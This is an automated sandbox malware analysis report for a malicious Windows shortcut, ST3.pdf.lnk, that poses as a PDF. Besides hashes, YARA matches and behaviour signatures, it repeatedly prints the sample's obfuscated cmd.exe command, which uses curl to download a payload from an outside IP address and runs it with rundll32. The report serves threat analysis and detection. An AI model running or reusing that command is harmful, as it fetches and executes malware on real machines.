Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 27, 2023, 10:52 a.m.	Sept. 27, 2023, 10:54 a.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Tue Sep 26 02:07:12 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`f2dee7265c1d540d0701faa3e1797902`
SHA256	`b731f539b6477fd44eeb3b02515a20087b3da4f7f806547f69c55a06c0be0d8c`
CRC32	`BA7CE60D`
ssdeep	`24:8a9WJCnBc2LA8v3+/nSicdt5GMxi8xI4vCfi8522TL2Da2Tf:8abi0+Sz5Bxjx3aKW2Da`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "FIXijuHnHlb" C:\Users\test22\AppData\Local\Temp\ST3.pdf.lnk
3040
- cmd.exe "C:\Windows\System32\cmd.exe" /c yHaS || eCHO yHaS & PInG yHaS || cuRl http":/"/135."1"2"5".17"7.82/U"M"Y"A"p"d"4/"Ze -o C:\Users\test22\AppData\Local\Temp\yHaS.log & PInG -n 4 yHaS || rundll32 C:\Users\test22\AppData\Local\Temp\yHaS.log scab /k besogon728 & eXIT 'XxUIjsuZeL
  2200
  - PING.EXE PInG yHaS
    2160
  - curl.exe cuRl http":/"/135."1"2"5".17"7.82/U"M"Y"A"p"d"4/"Ze -o C:\Users\test22\AppData\Local\Temp\yHaS.log
    2412
  - PING.EXE PInG -n 4 yHaS
    1880
  - rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\yHaS.log scab /k besogon728
    1832

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
135.125.177.82	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: 'yHaS' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: yHaS console_handle: 0x00000007	1	1
WriteConsoleA Sept. 27, 2023, 10:52 a.m.	buffer: Ping request could not find host yHaS. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Sept. 27, 2023, 10:52 a.m.	buffer: Ping request could not find host yHaS. Please check the name and try again. console_handle: 0x00000007	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\ST3.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c yHaS || eCHO yHaS & PInG yHaS || cuRl http":/"/135."1"2"5".17"7.82/U"M"Y"A"p"d"4/"Ze -o C:\Users\test22\AppData\Local\Temp\yHaS.log & PInG -n 4 yHaS || rundll32 C:\Users\test22\AppData\Local\Temp\yHaS.log scab /k besogon728 & eXIT 'XxUIjsuZeL

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	PInG -n 4 yHaS
cmdline	"C:\Windows\System32\cmd.exe" /c yHaS \|\| eCHO yHaS & PInG yHaS \|\| cuRl http":/"/135."1"2"5".17"7.82/U"M"Y"A"p"d"4/"Ze -o C:\Users\test22\AppData\Local\Temp\yHaS.log & PInG -n 4 yHaS \|\| rundll32 C:\Users\test22\AppData\Local\Temp\yHaS.log scab /k besogon728 & eXIT 'XxUIjsuZeL
cmdline	PInG yHaS

Communicates with host for which no DNS query was performed (1 event)

host

135.125.177.82

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3040 resumed a thread in remote process 2200
NtResumeThread Sept. 27, 2023, 10:52 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2200	1	0	0

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

135.125.177.82:80

ST3.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All